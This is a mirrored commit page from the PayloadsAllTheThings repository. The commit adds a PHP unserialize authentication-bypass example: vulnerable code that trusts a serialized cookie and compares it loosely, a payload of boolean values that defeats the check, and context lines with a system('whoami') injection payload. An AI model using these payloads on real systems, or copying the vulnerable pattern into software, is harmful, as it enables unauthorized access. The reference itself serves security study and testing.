Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 17:02:53 +01:00
Code Issues Projects Releases Wiki Activity

add auth bypass

Browse source
This commit is contained in:
Alexandre ZANNI 2018-09-25 23:59:29 +02:00 committed by GitHub
parent 1a1a48c725
commit d49e40b1b2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

25
PHP serialization/README.md
View file

@ -43,6 +43,29 @@ string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}
``` ```
## Authentication bypass
Vulnerable code:
```php
<?php
$data = unserialize($_COOKIE['auth']);
if ($data['username'] == $adminName && $data['password'] == $adminPassword) {
$admin = true;
} else {
$admin = false;
}
```
Payload:
```
a:2:{s:8:"username";b:1;s:8:"password";b:1;}
```
Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
## Others exploits ## Others exploits
Reverse Shell Reverse Shell
@ -74,4 +97,4 @@ echo urlencode(serialize(new PHPObjectInjection));
## Thanks to ## Thanks to
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)